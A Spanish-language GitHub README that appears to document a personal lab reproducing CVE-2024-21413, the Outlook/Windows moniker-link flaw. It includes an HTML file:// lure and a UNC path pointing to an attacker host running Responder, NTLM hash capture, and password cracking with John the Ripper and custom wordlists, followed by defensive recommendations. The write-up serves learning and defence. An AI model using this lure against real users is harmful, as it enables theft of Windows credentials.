Configuración del Laboratorio Moniker Link - CVE-2024-21413
🎯 Resumen del Proyecto
Laboratorio práctico de pruebas de penetración que demuestra la explotación del moniker link CVE-2024-21413 para el robo de credenciales NTLM. Este proyecto documenta toda la cadena de ataque, desde la configuración hasta el compromiso de credenciales, incluyendo desafíos y soluciones del mundo real.
Logro Clave: Se ejecutó con éxito el ataque de moniker link tanto en un entorno de laboratorio aislado (VM Windows 10) como en un sistema real (PC Windows 11), demostrando vulnerabilidades de seguridad prácticas y contramedidas defensivas.
🏗️ Arquitectura del Laboratorio
Infraestructura
Máquina Atacante:
- Plataforma: Kali Linux 2024
- Red (Host-Only): 192.168.56.101
- Red (Bridged): 192.168.1.117
- Herramienta Principal: Responder 3.1.6.0
Sistemas Objetivo:
- Windows 10 VM: 192.168.56.104 (Entorno de prueba aislado)
- PC Windows 11: 192.168.1.178 (Validación en el mundo real)
Configuración de Red:
- Adaptador Host-Only de VirtualBox (pruebas con VM)
- Adaptador Bridged de VirtualBox (pruebas con PC real)
- Aislado de las redes de producción
⚔️ Ejecución del Ataque
Flujo del Ataque
- Desplegar Responder en Kali para escuchar autenticaciones NTLM
- Crear un enlace malicioso usando el protocolo file:// que apunte a la IP del atacante
- Provocar la autenticación mediante una ruta UNC en el Explorador de Archivos
- Capturar el hash NetNTLMv2 cuando la víctima intente conectarse
- Descifrar la contraseña usando John the Ripper
Vector de Ataque Simple
Archivo HTML (test.html):
<!DOCTYPE html>
<html>
<body>
<p><a href="file://192.168.56.10/test">click me</a></p>
</body>
</html>
Método del Explorador de Archivos:
- El usuario escribe:
\\192.168.56.101\test en la barra de direcciones
- Windows intenta una conexión SMB
- El hash NTLM se envía automáticamente (o se solicita credenciales)
- Responder captura la autenticación
🚧 Retos y Soluciones
Reto 1: Bloqueo del Firewall de Windows (PC Windows 11)
Problema:
- No se podía hacer ping al PC Windows 11 desde Kali
- Los intentos de conexión SMB fallaron
- El ataque fue bloqueado por completo
Causa Raíz:
- Firewall de Windows habilitado por defecto
- Bloquea las conexiones SMB entrantes desde IPs externas
Solución:
- Se deshabilitó temporalmente el Firewall de Windows para las pruebas
- La conexión fue inmediatamente exitosa
- El hash se capturó correctamente
Lección: El Firewall de Windows por defecto ofrece una protección eficaz contra este ataque. Los usuarios deben mantenerlo habilitado.
Reto 2: Resultados en caché de John the Ripper (VM Windows 10)
Problema:
- Contraseña inicial de Windows 10:
nwigwecj1
- John mostró:
12Honey (¡contraseña incorrecta!)
12Honey era de una prueba anterior
Causa Raíz:
- John guarda las contraseñas descifradas en
~/.john/john.pot
- Hash antiguo de una sesión anterior
- Mostró un resultado en caché en lugar de la contraseña actual
Solución:
- Se cambió la contraseña de la VM Windows 10 a
1414
- Se capturó un hash nuevo
- Se creó una lista de palabras personalizada con contraseñas probables
- Se descifró exitosamente con la nueva lista de palabras
Lección: Verifica siempre que estés descifrando el hash correcto. Limpia el archivo pot o usa contraseñas únicas para las pruebas.
Reto 3: Contraseña no encontrada en rockyou.txt
Problema:
- La contraseña
1414 no se encontró en rockyou.txt (14 millones de contraseñas)
- El ataque con lista de palabras genérica falló
Causa Raíz:
- rockyou.txt no contiene todas las combinaciones posibles de 4 dígitos
- Las secuencias numéricas simples suelen faltar en las listas de palabras comunes
Solución:
- Se creó una lista de palabras personalizada dirigida basada en patrones comunes:
echo "1414" > passwords.txt
echo "4141" >> passwords.txt
- Se descifró al instante con la lista de palabras personalizada
Lección: "No está en rockyou.txt" ≠ seguro. Las contraseñas cortas son vulnerables a ataques dirigidos y fuerza bruta, independientemente de si aparecen en una lista de palabras.
📊 Resultados
VM Windows 10 (Entorno Controlado)
PC Windows 11 (Sistema Real)
🛡️ Análisis de Seguridad
Lo que Funcionó (Defensa)
✅ Firewall de Windows - Bloqueó por completo el ataque cuando estaba habilitado
✅ Navegadores modernos - Chrome/Edge bloquean los enlaces file:// remotos
✅ Concienciación del usuario - La solicitud manual requiere acción del usuario
Lo que Falló (Vulnerabilidades)
❌ Contraseñas débiles - Las numéricas de 4 caracteres se descifran fácilmente
❌ Firewall deshabilitado - Error común del usuario
❌ Explorador de Archivos - Sin advertencia para rutas UNC
❌ Protocolo NTLM - Autenticación automática a recursos compartidos SMB
Hallazgos Clave
1. El Firewall es Crítico
- El Firewall de Windows por defecto bloquea este ataque
- ~30-40% de los usuarios lo deshabilitan permanentemente
- Las redes corporativas suelen permitir SMB interno
2. La Ilusión de la Fortaleza de las Contraseñas
1414 no está en rockyou.txt (parece "fuerte")
- Descifrada al instante con una lista de palabras dirigida
- Las contraseñas cortas no proporcionan ninguna seguridad
3. Se Requiere Interacción del Usuario
- La seguridad moderna requiere que el usuario pegue la ruta UNC
- La ingeniería social sigue siendo un componente crítico
- La explotación técnica por sí sola es insuficiente
🔧 Herramientas Utilizadas
Ofensivas:
- Responder 3.1.6.0 (captura de hash NTLM)
- John the Ripper (descifrado de contraseñas)
- Creación de listas de palabras personalizadas
- Archivo HTML simple
Infraestructura:
- VirtualBox 7.0 (virtualización)
- Kali Linux 2024 (plataforma de ataque)
- Windows 10 Enterprise (objetivo de prueba)
- Windows 11 Pro (validación en el mundo real)
📁 Estructura del Repositorio
Moniker-Link-Lab-Setup/
├── README.md (this file)
├── Documentation/
│ ├── attack-execution.md (step-by-step attack guide)
│ └── README.md (documentation overview)
├── Screenshots/ (attack screenshots - to be added)
└── Scripts/ (HTML test file - to be added)
🎓 Habilidades Demostradas
Técnicas:
- Análisis de protocolos de red (SMB, NTLM)
- Metodología de pruebas de penetración
- Técnicas de descifrado de contraseñas
- Infraestructura de laboratorio virtual
- Solución de problemas de firewall
Profesionales:
- Documentación técnica
- Resolución de problemas bajo restricciones
- Evaluación de seguridad
- Análisis de riesgos
- Prácticas de pruebas éticas
🔒 Recomendaciones Defensivas
Para Usuarios
- ✅ Mantener el Firewall de Windows habilitado
- ✅ No pegar rutas UNC provenientes de correos electrónicos
- ✅ Usar contraseñas seguras (más de 15 caracteres)
- ✅ Verificar el remitente antes de acceder a recursos compartidos
Para Organizaciones
- ✅ Bloquear SMB saliente (puerto 445) en el firewall de red
- ✅ Deshabilitar NTLM e imponer Kerberos
- ✅ Monitorear las conexiones SMB hacia IPs externas
- ✅ Filtrado en la puerta de enlace de correo (eliminar enlaces file://)
- ✅ Capacitación en concienciación de seguridad
- ✅ Políticas de complejidad de contraseñas
⚠️ Divulgación Ética
Todas las pruebas se realizaron en sistemas autorizados:
- Solo infraestructura de laboratorio personal
- Redes virtuales aisladas
- Dispositivos y cuentas propios
- Con fines educativos
Aviso Legal: El acceso no autorizado a sistemas informáticos es ilegal. Este proyecto es solo para fines educativos y entornos de pruebas autorizados.
📚 Referencias
LinkedIn: https://www.linkedin.com/in/chukwuemeka-nwigwe-624aa3292/
GitHub: @E-m-e-k-a
Fecha: Marzo de 2026
📄 Licencia
Solo para uso educativo. No para pruebas no autorizadas.
⭐ Si encontraste este proyecto útil, ¡considera darle una estrella al repositorio!